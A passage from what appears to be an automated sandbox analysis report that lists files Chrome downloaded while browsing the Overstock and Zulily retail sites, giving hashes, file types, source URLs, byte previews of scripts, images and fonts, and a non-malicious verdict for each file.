                                                                                                                                                                                    Preview:...........i{.F.0.........DQ..d..<.,.J...82'O.h..@.&H-.y~...^.X...d.{.;.."..^.....k.%m.b4.....9....77..<O.Y.&s>c.|.M.[+t..(w..6.o>.....7..f....Mlk?.f..d.>~.c;.X..G....C.^3*.y..6Kg..W.$[L.v6.oFy{.3.X.O#Y.#6..6.A.Z.6Os.......O9...[6...h..l6o.m{./....Ng....v...,..|>.E....l.V.....hO.k..=....k..7..<.w..UnG.?JlY.=.....eS>._._..,..WapS.l&... .$...e.q0.z......3.G..t..`.....b.p.S.....t..;l:M.l..J..V...kX".....~......d...'.......'.4..t...3......^.@&...p7.N.z8d..zb.s......4.;+.e~yOV.y2.pYa..z.m.. ..e..y@M=\. o.>..&.....]D.`...X..b...j...mnF..q...l.....x4...>b.y6... .......4.1Y....E..Z..-;!l..6...Yv..p...g3.....m.../.y[aF{...Y......c...".h.4Zc...+*.......Y..!O.py{.->.|..~`./...<67k]I@.....{z.#.Y.V^..-..........".. ....wg:...~.S..t..~..C&......G.2...Uc.i\..6.d.6.3,G...(%...C....K.0..>{............. ....\n..[.z2.,....o..X.I;D......../..!.H.IN1......5P;.w.G...D!._..?..k5.ocw......%..`D.C...D].z.^.l=..p.6....|.z......a..../.mC...APS...p......t.......Gp..z.6~..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (32016)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):352958
                                                                                                                                                                                    Entropy (8bit):5.426988888464076
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:KBUQDNe0coewf3a98HrZhJ5ltUMGNq0ktTwPKa:KFDiojfWjzkI
                                                                                                                                                                                    MD5:91FCFF73FA1CD20E230ED06DE8A5EB3F
                                                                                                                                                                                    SHA1:DC2D791A00139FCBA44C38849E9140527A386986
                                                                                                                                                                                    SHA-256:56AB8DF09F1AC92EDE6F4ABAAB9E425F687B41EDBCFC272AC4D5912CE488BB7B
                                                                                                                                                                                    SHA-512:377F08C465EB87F0F2A8277F2E1DF67299D7AFC740BAE548E8734797489A884C654EE9005DE5F383771268D41E9F62E084D6F972CC906B0DBCA50028DE11CCBF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/js/overstock.8.1.10.min.js
                                                                                                                                                                                    Preview:window.NodeList&&!NodeList.prototype.forEach&&(NodeList.prototype.forEach=function(a,b){b=b||window;for(var c=0;c<this.length;c++)a.call(b,this[c],c,this)}),Array.prototype.includes||Object.defineProperty(Array.prototype,"includes",{value:function(a,b){function c(a,b){return a===b||"number"==typeof a&&"number"==typeof b&&isNaN(a)&&isNaN(b)}if(null==this)throw new TypeError('"this" is null or not defined');var d=Object(this),e=d.length>>>0;if(0===e)return!1;for(var f=0|b,g=Math.max(f>=0?f:e-Math.abs(f),0);g<e;){if(c(d[g],a))return!0;g++}return!1}}),function(a,b){"use strict";function c(a){this.time=a.time,this.target=a.target,this.rootBounds=a.rootBounds,this.boundingClientRect=a.boundingClientRect,this.intersectionRect=a.intersectionRect||k(),this.isIntersecting=!!a.intersectionRect;var b=this.boundingClientRect,c=b.width*b.height,d=this.intersectionRect,e=d.width*d.height;c?this.intersectionRatio=Number((e/c).toFixed(4)):this.intersectionRatio=this.isIntersecting?1:0}function d(a,b){v
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1366
                                                                                                                                                                                    Entropy (8bit):6.5293868561197845
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:YTCIl/X2YlXWI2PUxKPpHKqsUeSP81vDpRsUrqYSSSkWu:NIl/XflKPpqqLovDv12u
                                                                                                                                                                                    MD5:F5CE2A42D2D75917637E16DE78C8A32C
                                                                                                                                                                                    SHA1:1C4F539AB781348DDDD1D733CCF0C3B699BE7A87
                                                                                                                                                                                    SHA-256:FF478170332FA3C6D079A2E26B3EF28531BBAB1329C04938CA8772ED470BD747
                                                                                                                                                                                    SHA-512:A95547512134C50141EB303469E1C2FDAE450B01D4DC17E92D845C67F49F03BB24B2D7102E724A917CC3400836D201B75FC9405D575A2DE5D5E6758C384890AB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_36e1eca0-fbba-4263-b92d-5f3f3f342cf7.jpg?v=1729325087&width=80
                                                                                                                                                                                    Preview:RIFFN...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ....0....*P.P.>1..B.!..>....Z@4.l.s......w}..g...r......).8.....o...*!.6.../.Ep.........#`...J......5.~........... .....>.Z....UG...L.=...?.W.v.y.HZ..d.x..H.?....^g.......P.;...K..u...D...|:. .].c.D...F.;qxN....G].?.]..c.|..'IbO_.;.....%..^O......A..T.S]@"..u^D.2...E]..K....4...;..u.<<&I...h..{...Qr@......u.7I..A..!...7W<...n|W.he.;.D.H...Q.G..&.,..3..Waj.........x...GWB..~`...x....cT#y.^.{..f....v...N..(Y.+c|...2.9g.........}$.O..4...=.,......#.y.xm..^..^.1!..../:..T....a..L...S.Uj..h.7........#z....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):10366
                                                                                                                                                                                    Entropy (8bit):4.12348621500406
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:6BO82dk2ofUAvjA4K95Imbpex7PAzwJAtRTG0VB:6BO9urzunbENVJAtpG0/
                                                                                                                                                                                    MD5:0D925E9FD9B4FBDD8EB02D44A16C39C1
                                                                                                                                                                                    SHA1:314AC62D54011329DFC99A483E533DEB164A95CC
                                                                                                                                                                                    SHA-256:F24A918B57210227ECD51408BC89E4483CEFB7A7D2C8DDB223BB71DD0E7402DA
                                                                                                                                                                                    SHA-512:0183ABE41E7E32D6569C8F59FBD8B234470B21B7FC41D7B86F98B6296579997A7B7DA675B6C762B917CBF4B8AAAC379E0AC7533F42992BBCADCD72BFCA12EA8E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/10142024_Domestic_Bento2.svg?imwidth=1920
                                                                                                                                                                                    Preview:<svg width="571" height="212" viewBox="0 0 571 212" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_558_6657)">.<rect x="176" y="-12" width="136" height="136" rx="68" fill="#832E00"/>.<path d="M226.874 28.636H230.026V37.5H226.874V36.092C226.122 37.196 224.81 37.82 223.226 37.82C220.65 37.82 219.258 36.172 219.258 33.852V28.636H222.41V33.644C222.41 34.796 223.066 35.468 224.266 35.468C225.322 35.468 226.202 34.972 226.874 33.884V28.636ZM239.061 37.82C237.445 37.82 236.197 37.196 235.413 36.188V40.7H232.261V28.636H235.413V29.932C236.197 28.94 237.445 28.3 239.061 28.3C241.845 28.3 243.765 30.124 243.765 33.068C243.765 35.996 241.845 37.82 239.061 37.82ZM238.181 30.716C237.109 30.716 236.133 31.084 235.429 31.98V34.14C236.133 35.036 237.109 35.404 238.181 35.404C239.845 35.404 240.773 34.54 240.773 33.068C240.773 31.58 239.845 30.716 238.181 30.716ZM256.188 34.908L256.716 36.972C255.916 37.516 254.668 37.836 253.596 37.836C251.58 37.836 250.06 36.732 250.06 34.588
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (46330), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):46333
                                                                                                                                                                                    Entropy (8bit):5.57453197308718
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:lKiFCw9KZcQ04B8uol3jS3g4M0xPmlqzq0R7UrfXy8hTfwX881L5qTM6MsCP9vJv:sCt9KZcQf8DQNU4N6yJAM9
                                                                                                                                                                                    MD5:627A1CC38FD050B39190C42CA316C673
                                                                                                                                                                                    SHA1:08CAA20D2D37148EEB76E75A63EE5D420F8F33DA
                                                                                                                                                                                    SHA-256:A55857C41513B522263D75AA65BD0E147FC950FCFB037078872F1EB6076F7BD1
                                                                                                                                                                                    SHA-512:C85EF3E76F9DD883B13D02C19BDDBF9412A8E76171BAAC34D0933FE2FEA455514E4BD4C7D1B0810726E2E74AE17E229D4ED6BB253EB84B41F3E959494F5DD92F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/page-triggers.880.chunk.a55857c41513b522263d75aa65bd0e147fc950fcfb037078872f1eb6076f7bd1.js
                                                                                                                                                                                    Preview:"use strict";(self.webpackChunkpage_triggers=self.webpackChunkpage_triggers||[]).push([[880],{2543:function(e,t){Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;t.default=function(){return function(e){if(window)try{window.dataLayer=window.dataLayer||[],window.dataLayer.push(e)}catch(e){console.error("Error pushing to dataLayer: ".concat(e))}}}},9880:function(e,t,i){var n=i(5318);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var o=n(i(7757)),a=n(i(8926)),r=n(i(9713)),l=n(i(3038)),s=i(8661),d=n(i(5697)),c=i(8422),p=i(4262),u=n(i(6380)),m=n(i(3971)),f=n(i(2543)),C=n(i(6229)),x=n(i(2325)),h=n(i(1615)),g=n(i(6486)),b=n(i(6532)),v=i(5437),w=i(6584);function y(e,t){var i=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),i.push.apply(i,n)}return i}function _(e){for(var t=1;t<arguments.length;t++){var i=null!=arguments[t]?arguments[t]:{
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 38004, version 1.0
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):38004
                                                                                                                                                                                    Entropy (8bit):7.994273884660368
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:768:1+KrVjWn7cobr3n6q2wtQwKtIvVkKe6NdkEe2ePG+wlOZs5:NVMf364uwCJMkEe2eGDgZQ
                                                                                                                                                                                    MD5:EF875F52AB58D4D3C08A6A00275E6186
                                                                                                                                                                                    SHA1:49FD1CD7E5567133DA00769D4BEB51C7230E852B
                                                                                                                                                                                    SHA-256:D51B2896D0CA8024ECA8C509D7C30C50C73E28CDFBCD3B4D961EC918D52C5067
                                                                                                                                                                                    SHA-512:364C289787770226B9CB842995E275D112E53A2BE18D5995BB97C1BEBF1A3F47689563F0F263CBE057FF29F248DF8D776FE3A2E7032C43AA4650E53B999D7D76
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.zulily.com/cdn/shop/t/70/assets/belltown-bold-webfont.woff2
                                                                                                                                                                                    Preview:wOF2.......t....................................?FFTM..*..*..>.`..V.<..e.....x..z.6.$..H..f.. .. ..k..]?webf.[..q..]..t'0Z...c..<Sn......q.R`..dX.D...g'.14-..(........Q...D.RK....[4.,m<.V7..R..D.....#c...V..xJvu(.....y.G:.U..2:.~ RC..jiJ.I..N.......@..X.........L.i...N........Y....}.....c.y...J:.B.}+....%f....O.d.)\;.F.r7o...1..s....re....7..P..%..?.W...w/"N0..?...3.fA.U. &)5.P..9....FH...T.,.5....m..(rc..5.G.D.....8a\..Fbb%W.......!.O...!.My...X.@X...<.z..Y.$.]...u.@......>.+....%mz..pYS..QAQ>e..U.<N"$......H..Jg..T%.~3.........[.KEV..F.5..*...8b.bH..o:...o.Z..o......B.&J.'.*...>.*.....3.....hC.......S.s\jd.L/W...4.$Q'..n.N...|v.......+]..?..e.!1.L{-_.o.8:....E.. z..n....s.r..*N.........~..`.E.164...K....{".a..C}.z........4M&uJ.ie.......6.....H5q.dH.JQ...yu./YH.e../p@..a...8..p.1(...*.x...6./x.FHy].03..!;.,......!.?..n....j...f.R...{.WN6e...d^ ym..Ayr..h.........="..:.......%.u-.0z...<GQ.(.7.......3Ob7.-.7b.3....-.N......t+...4f. .Y
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):125207
                                                                                                                                                                                    Entropy (8bit):3.7199219664278846
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:e8B8+l26agbvW5F69HRD3NHiX0H8rAVLtHuJyxejw1w4ZnQVXIYJ9nF:huAU
                                                                                                                                                                                    MD5:C02E9199307190AA888F31B4ABB38529
                                                                                                                                                                                    SHA1:3DA6895FC485DC10D19799BABA697831B8407B9F
                                                                                                                                                                                    SHA-256:2FCC03897FD7A0DC79EAA6A02380F53711F9C7BEA94100F4FE4EAC38B6A9AD88
                                                                                                                                                                                    SHA-512:ADC04441D8E286E083311BB5E96367C3BA4E8873C58E51CAB7FF6AFF321299502052BB4012EC7CDD02C638B239A160504A98DD78CDF47083325DBEC9299EE288
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:<svg width="805" height="447" viewBox="0 0 805 447" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_2165_728)">.<rect x="118.843" y="322" width="172.397" height="48" rx="4" fill="#FFC84C"/>.<path d="M155.478 338.72H157.378V351.4H164.938V353H155.478V338.72ZM173.492 346.84C173.465 346.44 173.372 346.06 173.212 345.7C173.065 345.34 172.858 345.033 172.592 344.78C172.338 344.513 172.032 344.307 171.672 344.16C171.325 344 170.938 343.92 170.512 343.92C170.072 343.92 169.672 344 169.312 344.16C168.965 344.307 168.665 344.513 168.412 344.78C168.158 345.047 167.958 345.36 167.812 345.72C167.665 346.067 167.578 346.44 167.552 346.84H173.492ZM175.132 349.72C174.905 350.88 174.405 351.753 173.632 352.34C172.858 352.927 171.885 353.22 170.712 353.22C169.885 353.22 169.165 353.087 168.552 352.82C167.952 352.553 167.445 352.18 167.032 351.7C166.618 351.22 166.305 350.647 166.092 349.98C165.892 349.313 165.778 348.587 165.752 347.8C165.752 347.013 165.872 346.293 166.112 345.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1560)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1775
                                                                                                                                                                                    Entropy (8bit):5.0855295906697
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:dvPioG+d99D9ND9dKh2EZGS1eYzs9SHgm4:tP6u9RNRdKbgMGSM
                                                                                                                                                                                    MD5:A5A0C9048EFB7CB5DF90023064D09BA4
                                                                                                                                                                                    SHA1:9669B2608D986D4742DD2C0C114B148B6CDB5CDE
                                                                                                                                                                                    SHA-256:DDFBE9EE1F7088339A85FA25A259765ADE4258C082A7921B9F569FF9616F904A
                                                                                                                                                                                    SHA-512:97ED945E9CEFE0C070946F5D97E9D641FB7B1D9EC710DC3865D307E9F59E07D238084699D3C4E52E2F470A207AEE0E19C9C1939333DFEF041769976A0F5F1B48
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:/*!. * Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */@font-face{font-family:"FontAwesome";font-display:block;src:url(../webfonts/free-fa-solid-900.woff2) format("woff2"),url(../webfonts/free-fa-solid-900.ttf) format("truetype")}@font-face{font-family:"FontAwesome";font-display:block;src:url(../webfonts/free-fa-brands-400.woff2) format("woff2"),url(../webfonts/free-fa-brands-400.ttf) format("truetype")}@font-face{font-family:"FontAwesome";font-display:block;src:url(../webfonts/free-fa-regular-400.woff2) format("woff2"),url(../webfonts/free-fa-regular-400.ttf) format("truetype");unicode-range:u+f003,u+f006,u+f014,u+f016-f017,u+f01a-f01b,u+f01d,u+f022,u+f03e,u+f044,u+f046,u+f05c-f05d,u+f06e,u+f070,u+f087-f088,u+f08a,u+f094,u+f096-f097,u+f09d,u+f0a0,u+f0a2,u+f0a4-f0a7,u+f0c5,u+f0c7,u+f0e5-f0e6,u+f0eb,u+f0f6-f0f8,u+f10c,u+f114-f
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (3395)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3396
                                                                                                                                                                                    Entropy (8bit):5.081841829974535
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:Mdab9dm1jA9hvR7E+01B+UiJPhOfCR0g6Fbf3WfJZy9vn:MdabY2JZ01iV/uzWqn
                                                                                                                                                                                    MD5:F4C61DB2EABCB9E723699663DB365077
                                                                                                                                                                                    SHA1:386557A62AC212BBAF9895FA6179406C0327D086
                                                                                                                                                                                    SHA-256:E6C8F79F5369F9E760540F8A5E0A6FC34073A35D1729CA0B89E8B3E386591986
                                                                                                                                                                                    SHA-512:E828B6A90763F6BC7A8226B73C8448F872ABF30F3F032986E9B577FB80CA19028006B36EDF84513C5022064A87AA613D684927E5DCE189D04FA2F06ABD222EB4
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/StockProblemsLineItemList.DbYV5-zv.js
                                                                                                                                                                                    Preview:import{e as u,D as m,a as e,aa as o,az as b,a9 as g,aQ as f,b0 as l,b1 as k,b2 as s,G as S,E as _,b3 as P,b4 as h,b5 as L,S as d,b6 as I,b7 as c,b8 as C,b9 as T}from"./app.DfgMZONA.js";function z({quantity:n,previousQuantity:t}){const a=u(),{lineItems:{titleTypographyStyle:i,optionsTypographyStyle:r,optionsAppearance:p="subdued",optionsEmphasis:y}}=m();return e(b,{spacing:"none",inlineAlignment:"end",children:[e(o,{...{size:"small",appearance:p,emphasis:y,style:r},appearance:"subdued",accessibilityRole:"deletion",children:a("stock.item_label",{count:t},{one:"{{count}} item",other:"{{count}} items"})}),e(o,{style:i,children:a("stock.item_label",{count:n},{one:"{{count}} item",other:"{{count}} items"})})]})}const O="IDG1X",R={OutOfStockLabel:O};function v({merchandiseIssueType:n}){const t=u(),a=()=>{switch(n){case l.Unfulfillable:case l.Unavailable:return t("contextual_availability.unavailable_label","Unavailable");case l.Unpurchasable:case l.UnpurchasableB2B:return t("stock.unpurchasabl
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):4099
                                                                                                                                                                                    Entropy (8bit):4.689032470968796
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:4Zc5WT9BvpXKZhUyXuXsk8hLb3Dhm2ykOof:4Zc5WNXK3XuXW5T
                                                                                                                                                                                    MD5:A4756A643D066EB154CB755E259EF155
                                                                                                                                                                                    SHA1:80965B4362B43BC28BAC4436A24E1330170A077B
                                                                                                                                                                                    SHA-256:65C8359CA3EDF304556D797A955249CE92B75224834F77F8E170C71D163ABB76
                                                                                                                                                                                    SHA-512:CDBEBB4DED2C449760736DA45CEB59B4B1D32EBE9ACB46ED8F87594BDBD35D87E2E3A755B3E8A6741BC58105C8D17476A666D0138F7FEA71636D68DF6FC7193A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://bat.bing.com/p/action/5129621.js
                                                                                                                                                                                    Preview:(function(w,d,c,k,a,b,t,e) {.. var cs = d.currentScript;.. if (cs) {.. var uo = cs.getAttribute('data-ueto');.. if (uo && w[uo] && typeof w[uo].setUserSignals === 'function') {.. w[uo].setUserSignals({'co': c, 'kc': k, 'at': a, 'bi': b, 'dt': t, 'ec': e});.. }.. }..})(window, document, 'us', true, false, false, false, false);..(function(w,d,s,i) {.. var c=d.currentScript;.. if (c) {.. var uo = c.getAttribute('data-ueto');.. if (uo && w[uo] && w[uo].uetConfig && w[uo].uetConfig.deBlock === true).. return;.. }.. var f,j; f=d.getElementsByTagName(s)[0]; j=d.createElement(s); j.async=true;.. j.src='https://www.clarity.ms/tag/uet/'+i+'';.. j.onload = function () {.. if (!c) return;.. var co = function(u) { return u && typeof u === 'object' && !(u instanceof Array) && u.beaconParams && u.beaconParams.mid && w.clarity; };.. var r = 40;.. var cl = function() {.. if (r-- <
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):13
                                                                                                                                                                                    Entropy (8bit):2.7773627950641693
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                    MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                    SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                    SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                    SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://td.doubleclick.net/td/rul/16653831969?random=1730294593250&cv=11&fst=1730294593250&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4as0v9191916476z89186972359za200zb9186972359&gcd=13l3l3l3l1l1&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.zulily.com%2Fwpm%40d9f539ffw0e1474c4pae8b6d69m179c86ad%2Fcustom%2Fweb-pixel-98566460%406%2Fsandbox%2Fmodern%2F&ref=https%3A%2F%2Fwww.overstock.com%2F&top=https%3A%2F%2Fwww.zulily.com&hn=www.googleadservices.com&frm=2&tiba=Zulily&npa=0&pscdl=noapi&auid=602182949.1730294591&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
                                                                                                                                                                                    Preview:<html></html>
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (52230), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):52230
                                                                                                                                                                                    Entropy (8bit):5.402491914545316
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:T7YLPlDg5xLnzax89tl4isUeWu1bJjwvblf9oiob5Y6USEqS:Y6nax89EisseJsvVOilSG
                                                                                                                                                                                    MD5:ABE0CE9EEA042AFEABAF933BC573360D
                                                                                                                                                                                    SHA1:0E8555A2840ADC7DC898C74700917744ABED1E5D
                                                                                                                                                                                    SHA-256:98F0F892623CB9AF03889B3DCB58DBCD6E476B419DEAC537DC00EA22D8B48FE5
                                                                                                                                                                                    SHA-512:F9F491041286351E9DE89FD875A667465C5363481A25D089D05F7DEDA658C1B36C9B5F90FC60859477E5CD7FBA0B98351956AC28F0894B108790AF9B67D514FF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/page-triggers.main.bundle.98f0f892623cb9af03889b3dcb58dbcd6e476b419deac537dc00ea22d8b48fe5.js
                                                                                                                                                                                    Preview:!function(){"use strict";var e,t,n,r={2759:function(e,t,n){var r=n(5318);Object.defineProperty(t,"__esModule",{value:!0}),t.default=t.clientConfig=void 0;var o=r(n(9713));function a(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}function i(e){for(var t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]:{};t%2?a(Object(n),!0).forEach((function(t){(0,o.default)(e,t,n[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(n)):a(Object(n)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(n,t))}))}return e}var u={API_URL:{development:"https://api-integration.test.overstock.com/",test:"https://api-integration.test.overstock.com/",prod:"https://api.bedbathandbeyond.com/"},ASSET_URL:{development:"https://images-common.test.overstock.com/static/pag
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2, hostcomputer=imagery4], progressive, precision 8, 588x460, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):36323
                                                                                                                                                                                    Entropy (8bit):7.931762310915746
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:PqeTP6dbut1Qa+I8WiSrkhW6l1ul4hyCIoToeeP8GY2xIfNP1NhOkaF/A9N9Pylx:yerntqwlAh7JtsbA5YkaF49N9aljv2GV
                                                                                                                                                                                    MD5:828E5BDDFBCF4A073BFA94A31943D556
                                                                                                                                                                                    SHA1:8C632BFDF762B17687C4CB7F0DE36B25C761064A
                                                                                                                                                                                    SHA-256:66A7245F51351AE413315458F69F869872C42FD7F30AC814107A766D353A30A9
                                                                                                                                                                                    SHA-512:99640A1D9DDF1219D488295007A633EE075E96CB2152EC0C9786694A0C768FD9D80CDC4A06E71137FA252B177769BAA9D0B5AD43C0E14F875025296817146B82
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(...........<.......f...i.......p.......................imagery4............0210....................L.......................ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}........L....................................................................................[..P@.%..Vq.....3 K. .......?..<.....*.U.....$..@....@..!...%...$znl..@..!#...]n\........@..?.]N\.J.."... .T.B ....!....!.B.$!..G... ..!..)9\z.nY@..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):79
                                                                                                                                                                                    Entropy (8bit):2.716326985350135
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:tQTltaL5UJjV9GjUJjVE:6XG5UJjGjUJj2
                                                                                                                                                                                    MD5:8E3DB10AF5A3E1CABE7AA67674E21188
                                                                                                                                                                                    SHA1:E2314B0038DF2D49DDBE461F33A6797D4586CDE0
                                                                                                                                                                                    SHA-256:87ECD5BABD6FD9F4F6F796D745AA38751FAF3985E3B55F87A2F53E506FE07362
                                                                                                                                                                                    SHA-512:A4F136016F4591E021D54F06141896581371828BF02F662A050B2A36567DFEC6068A4C758815D481E01BD7D68692329B5EE228C854AB2D85246D05B56692FB09
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:[71, 73, 70, 56, 57, 97, 1, 0, 1, 0, 0, 0, 0, 44, 0, 0, 0, 0, 1, 0, 1, 0, 0, 2]
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (63731)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):137770
                                                                                                                                                                                    Entropy (8bit):5.322166982227251
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:vBX3hojdALuld890ANs9i2DUCRJCAIc77UuDo+:5X3haMuldQK9i2DUCRIAIE7UV+
                                                                                                                                                                                    MD5:C5A6761F646794796E3E34332FBAB17A
                                                                                                                                                                                    SHA1:7501E135DC7A3AED832DD09DD5E88C780F75A36D
